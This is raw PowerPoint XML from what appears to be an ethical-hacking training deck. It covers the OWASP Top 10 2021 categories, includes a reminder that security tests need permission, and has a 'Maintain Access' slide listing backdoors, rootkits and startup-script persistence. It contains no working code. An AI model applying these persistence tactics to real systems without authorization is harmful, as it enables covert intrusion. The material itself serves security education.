          <p:cNvPr id="45" name="Picture 44" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{484F6D9D-2A48-D332-ABED-CD79BE1B334F}"/>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15DAD70A-40A3-AFE3-913D-D64AD9DBC310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402262" y="861328"/>
            <a:ext cx="11387475" cy="30162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l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MAINTAIN ACCESS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Goal</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Ensure continued access to the system over time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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Activities</a:t>
            </a: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Install backdoors or rootkits.</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Use scheduled tasks or startup scripts to regain access after a reboot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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Monitor and adapt to security measures to avoid being removed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="Backdoor - Free security icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5187B07D-433D-8047-3E12-579E5A4E1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2810" y="3429000"/>
            <a:ext cx="2781478" cy="278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04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0ADE0-B01E-7E58-6EA7-F50796AEB56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2DE8A9C-4629-5698-13DE-589CE608B554}"/>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283B8239-9204-8B9B-7FC5-4C0C5E5F8532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1992493" y="2053534"/>
            <a:ext cx="8207013" cy="2750932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most important thing to keep in mind: you need permission to perform a security test!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4042715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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30312185-DED7-3757-71DA-0315C2C9068A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="35000"/>
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent3">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>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3103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a:xfrm>
            <a:off x="187481" y="2206701"/>
            <a:ext cx="6756996" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOHD AKMAL HARITH BIN MOHD FADHLI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3DC3311-42A1-41B3-8E2B-402E628C9E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164538" y="4322850"/>
            <a:ext cx="6083285" cy="984885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bachelor of Computer Science (Computer System Security), National Defense University of Malaysia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06FB0DE-43B1-416A-B6B4-F14B2E893A4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100438" y="3066876"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Engineer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OrenG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Academy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sdn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bhd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Diploma roll with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2149FDB6-FC0E-451E-8E59-379AC6B4AC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504" y="4322850"/>
            <a:ext cx="724247" cy="724247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37CF74FE-8F4A-40A0-9408-2BC3A4979F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7247823" y="1424539"/>
            <a:ext cx="0" cy="478375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E41DE7C-DB97-40BC-8A9D-E7042093D3C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="12827" t="2001" r="20461" b="2496"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8209844" y="1752316"/>
            <a:ext cx="3093048" cy="3042463"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="080808"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381731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EBEBE-9EC3-79E6-434B-88CB1237E418}"/>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CE3E5E53-1F9C-2DD0-0E35-7AEDD532C09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3335118544"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="361950" y="719666"/>
          <a:ext cx="114681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OWASP Top 10 Security Vulnerabilities in 2021 | ImmuniWeb">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6AB4281-68BE-7B15-B21C-5C12458CCD9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467" t="17623" r="10000" b="51784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4171950" y="812800"/>
            <a:ext cx="3848100" cy="144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41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al Life Examples of Web Vulnerabilities (OWASP Top 10)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9463A185-EB65-8F93-9ED8-F32F40B5D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620" y="1442639"/>
            <a:ext cx="10353013" cy="507585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OWASP TOP 10 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="605295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0C8B8-C053-CB51-25F5-1DC799989E0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EB136DF-05E3-4F86-D2F3-2EA1CE46A011}"/>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9A8B98-3BF2-167D-85D3-67E3A7480BBA}"/>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A01: BROKEN ACCESS CONTROL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46CF670E-9245-045B-B581-6696E30EE82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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2543BB48-B979-A601-0C40-459E7CC00966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="943303" y="1063756"/>
            <a:ext cx="4274728" cy="2752156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF0DD46C-9552-24C5-FC14-9FA8445E07B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035818" y="4051089"/>
            <a:ext cx="6148618" cy="2337221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 2" descr="Broken Access Control: #1 on OWASP Top 10 List in 2021">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF41DF1-BAC3-5DBD-77FE-1B5582580B7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Broken Access Control: #1 on OWASP Top 10 List in 2021">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46D5EB9-422A-047C-BCBC-258F796A210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E3F153E-01B5-77BC-DC9B-A8BC138BF528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7126369" y="959682"/>
            <a:ext cx="3176014" cy="2926518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299377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8DC5D-9425-6A3B-8F7F-754B3253100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E1DB4A8-B770-B9C2-544D-221B9BAA12AB}"/>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92DBFBF4-2B67-B97C-6D97-1BAD2ACCADC1}"/>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A02: CRYPTOGRAPHIC FAILURES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E2B390B-0188-2522-B450-208165736D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6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36293DD-3CC3-9C3F-A838-FBB9B9C227E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect t="36201" r="30173"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="650617" y="1435608"/>
            <a:ext cx="5078851" cy="1732761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A37D033-EC5D-7134-A3D7-E6A3FCB2A2B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4730089" y="3495515"/>
            <a:ext cx="6736664" cy="2423370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="903322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11064-4AE7-4FCD-2039-04B0674ABAA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A5C16CD-2FA4-7170-F6D9-2842498FF969}"/>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36C198F-9D38-27BE-8F32-15052BD7FC5C}"/>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A03: INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B3BBCB-1966-AA84-1260-84090814E7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2050" name="Picture 2" descr="SQLi: principles, impacts and security best practices">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74F7C3B-9357-52DB-3C53-E406B0AD5B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26" t="5359" r="14367" b="24893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3339296" y="1744883"/>
            <a:ext cx="5208608" cy="336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355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4EFB2-4AAD-E0C9-C4AF-E0F57393D2E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6A8D92A-81CE-196F-EBF1-80439AEC1EBD}"/>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0866A083-1CA1-34C9-3ACC-EB0C5E466099}"/>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A04: INSECURE DESIGN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521C3471-BA7F-7170-735F-AF53BC8B55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3074" name="Picture 2" descr="Ask the Techspert: Strong Passwords - Senior Planet from AARP">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C866E895-1CCD-1B76-019B-DEA5E6001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443" y="2227622"/>
            <a:ext cx="4225322" cy="26540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40 Best Login Page Examples and Responsive Templates [FREE DOWNLOAD]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669BF294-D0E9-5135-A5F8-FB62BDBB7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53659"/>
            <a:ext cx="5297352" cy="32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079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E3141-53B2-2B18-14CB-A39786DAB4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28483BC-34A1-4BA4-AAC9-47892F437469}"/>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6CEBC7E0-DE7B-B9A5-4FAC-3E7E7CBD99DB}"/>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A05: SECURITY MISCONFIGURATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E92EA87-031E-BA56-999A-5F907A073DF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4098" name="Picture 2" descr="Directory Listing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64DC75AC-8CFE-016A-E569-54FBA7B292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388" y="1122594"/>
            <a:ext cx="5000825" cy="31246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om Django Debug Mode to PII Data Leak of more than 500+ Employees due  Broken Access Control and IDOR | by Aayush Vishnoi | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08254D7A-BCF7-FD49-1BB7-343E5891F3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1589" y="3970773"/>
            <a:ext cx="6939023" cy="240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428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97927-F35E-4CFF-07F7-7A8A31E48F2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A113925-5AD9-5D6A-D057-8DA9BA6944E1}"/>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C437A85F-B683-3EF2-D0C5-015BF30EE093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A06: VULNERABLE AND OUTDATED COMPONENTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D5E73C-17BD-6500-8E89-018F98358B5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5122" name="Picture 2" descr="The jQuery Security Model Explained - Virtue Security">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A917ED-0411-92D4-F562-E19831773B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2873"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2034130" y="1732179"/>
            <a:ext cx="7337957" cy="231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26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713C3-C421-4C61-4FB6-03E216F16CF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C6BE2D4-9D74-67B9-757E-2F3AC8390BB6}"/>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99C03835-6768-952C-05F7-84C589A4D379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A07: IDENTIFICATION AND AUTHENTICATION FAILURES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F30B60DE-3AE2-8F24-BA1C-6636C812FB9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6146" name="Picture 2" descr="OWASP_AuthAndSessionManagement_7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843904CD-16E6-4C84-226E-92FC2888E6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0127" y="3276600"/>
            <a:ext cx="4762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to Add CAPTCHA in WordPress Login and Registration Form - in 2022 -  Orange County Website Design Development | Digital Marketing">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E10896D-327C-7DCC-FB4C-62AE1359C3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2989"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1037874" y="1443777"/>
            <a:ext cx="403438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464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AC579-931F-1DAF-B6A8-F2976AF7FB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BA6EB1A-F366-912E-90CD-C65B375F719A}"/>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C49D6488-7D6F-1D6A-1CEE-C69409FACF4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A08: SOFTWARE AND DATA INTEGRITY FAILURES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69559AFA-D23C-6121-7482-F9F71AA789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7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A86BC1A2-EF45-C86A-31CB-5F65015B01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63"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3518703" y="2074596"/>
            <a:ext cx="4546922" cy="207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462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47325" y="1100849"/>
            <a:ext cx="5320937" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
